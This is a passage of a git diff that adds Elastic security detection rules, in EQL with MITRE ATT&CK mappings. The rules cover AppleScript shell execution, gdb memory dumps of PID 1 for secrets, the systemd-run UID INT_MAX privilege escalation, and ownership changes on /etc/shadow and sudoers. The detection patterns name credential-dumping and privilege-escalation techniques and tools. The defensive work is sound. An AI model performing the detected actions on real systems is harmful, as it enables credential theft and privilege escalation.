non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + }, + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "d331bbe2-6db4-4941-80a5-8270db72eb61_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json new file mode 100644 index 00000000000..a395ecb7cbe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_106.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the shell process (sh) via scripting (JXA or AppleScript). Adversaries may use the doShellScript functionality in JXA or do shell script in AppleScript to execute system commands.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Shell Execution via Apple Scripting", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\", \"info\") and process.name == \"osascript\"] by process.pid\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"sh\" and process.args == \"-c\"] by process.parent.pid\n", + "references": [ + "https://developer.apple.com/library/archive/technotes/tn2065/_index.html", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "d461fac0-43e8-49e2-85ea-3a58fe120b4f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json new file mode 100644 index 00000000000..cd1d5baa84f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4.json @@ -0,0 +1,68 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json new file mode 100644 index 00000000000..870c78f4388 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json new file mode 100644 index 00000000000..c89c73eb8ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include \"truffleproc\" and \"bash-memory-dump\". This behavior should not happen by default, and should be investigated thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux init (PID 1) Secret Dump via GDB", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"gdb\" and process.args in (\"--pid\", \"-p\") and process.args == \"1\"\n", + "references": [ + "https://github.com/controlplaneio/truffleproc", + "https://github.com/hajzer/bash-memory-dump" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.007", + "name": "Proc Filesystem", + "reference": "https://attack.mitre.org/techniques/T1003/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json new file mode 100644 index 00000000000..b6ea9fe90bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_5.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", + "references": [ + "https://twitter.com/paragonsec/status/1071152249529884674", + "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", + "https://gitlab.freedesktop.org/polkit/polkit/-/issues/74" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55436a8-719c-445f-92c4-c113ff2f9ba5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d55436a8-719c-445f-92c4-c113ff2f9ba5_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json new file mode 100644 index 00000000000..c6df78a6944 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_2.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a processes (granted CAP_CHOWN and/or CAP_FOWNER capabilities) is executed, after which the ownership of a suspicious file or binary is changed. In Linux, the CAP_CHOWN capability allows a process to change the owner of a file, while CAP_FOWNER permits it to bypass permission checks on operations that require file ownership (like reading, writing, and executing). Attackers may abuse these capabilities to obtain unauthorized access to files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities", + "query": "sequence by host.id, process.pid with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.name != null and process.thread.capabilities.effective : (\"CAP_CHOWN\", \"CAP_FOWNER\") and\n process.command_line : (\"*sudoers*\", \"*passwd*\", \"*shadow*\", \"*/root/*\") and user.id != \"0\"]\n [file where host.os.type == \"linux\" and event.action == \"changed-file-ownership-of\" and event.type == \"change\" and\n event.outcome == \"success\" and file.path in (\n \"/etc/passwd\",\n \"/etc/shadow\",\n \"/etc/sudoers\",\n \"/root/.ssh/*\"\n ) and user.id != \"0\"\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55abdfb-5384-402b-add4-6c401501b0c3", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/ -p rwxa -k audit_recursive_etc\"\n -- \"-w /root/ -p rwxa -k audit_root\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "d55abdfb-5384-402b-add4-6c401501b0c3_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json new file mode 100644 index 00000000000..23759497708 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d55abdfb-5384-402b-add4-6c401501b0c3_3.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a processes (granted CAP_CHOWN and/or CAP_FOWNER capabilities) is executed, after which the ownership of a suspicious file or binary is changed. In Linux, the CAP_CHOWN capability allows a process to change the owner of a file, while CAP_FOWNER permits it to bypass permission checks on operations that require file ownership (like reading, writing, and executing). Attackers may abuse these capabilities to obtain unauthorized access to files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities", + "query": "sequence by host.id, process.pid with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name != null and process.thread.capabilities.effective : (\"CAP_CHOWN\", \"CAP_FOWNER\") and\n process.command_line : (\"*sudoers*\", \"*passwd*\", \"*shadow*\", \"*/root/*\") and user.id != \"0\"]\n [file where host.os.type == \"linux\" and event.action == \"changed-file-ownership-of\" and event.type == \"change\" and\n event.outcome == \"success\" and file.path in (\n \"/etc/passwd\",\n \"/etc/shadow\",\n \"/etc/sudoers\",\n \"/root/.ssh/*\"\n ) and user.id != \"0\"\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d55abdfb-5384-402b-add4-6c401501b0c3", + "setup": "## Setup\n\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, 